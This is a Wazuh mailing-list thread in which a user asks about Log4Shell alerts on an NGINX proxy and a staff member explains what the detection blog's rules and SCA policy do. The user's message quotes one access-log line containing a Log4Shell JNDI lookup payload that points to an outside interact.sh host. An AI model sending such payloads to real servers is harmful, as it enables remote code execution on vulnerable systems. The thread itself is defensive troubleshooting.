
On 17 Jan 2022, at 21:37, Juan Pablo Cordone Rosello <juan.c...@wazuh.com> wrote:
Hi Mauro,
Sorry for the belated response. The blog post you followed has two separate sections:
- Detecting whether your environment has any endpoint with a vulnerable Log4J library: This helps you configure the security configuration assessment (SCA) capability to find out whether your environment is vulnerable or not. It does not do any remediation, but if you check the SCA policy, it does provide a hint towards what the remediation is:
- Detecting exploit attempts: this rules are just to detect if there were any exploit attempts, regardless of whether they were successful or not. There is no active response configured on the post.
Please let us know whether this answers your questions or you need any further clarification.
Regards,
JP.-On Monday, December 27, 2021 at 8:01:31 PM UTC-3 mauro....@cmcc.it wrote:Dear Users,I'm trying to protect our NGINX-based proxy from Log4j attacks.Log4j package is not installed on the proxy server and all the services behind the proxy have the updated version of Log4j.Unfortunately, after applying the solution provided here https://wazuh.com/blog/detecting-log4shell-with-wazuh/, Wazuh started detecting a lot of Log4j attacks and it stopped them with active-responses.Now my questions are:1) do I need to do something else to make the proxy safe? is Wazuh enough to be sure or I should add a WAF?
2) I noticed that, sometimes, NGINX server response is "HTTP/1.1 200".What does it mean? Why it happens? Proxy doesn't have Log4j...Received From: "proxy Ip"->/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 107.77.106.62
Portion of the log(s):
107.77.106.62 - - [27/Dec/2021:23:31:53 +0100] "GET /?uoasq=${jndi:ldap://proxy_ipc753v6c2vtc0000ew2vggd1t7uryyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
Could you please help me to understand how I should proceed?Thank you in advance,Mauro
--
You received this message because you are subscribed to a topic in the Google Groups "Wazuh mailing list" group.
To unsubscribe from this topic, visit https://groups.google.com/d/topic/wazuh/k7fkLjIMNwc/unsubscribe.
To unsubscribe from this group and all its topics, send an email to wazuh+un...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/wazuh/1fdf21c0-bccf-411e-912c-2cbbac82a011n%40googlegroups.com.
<Wazuh - Log4J.png>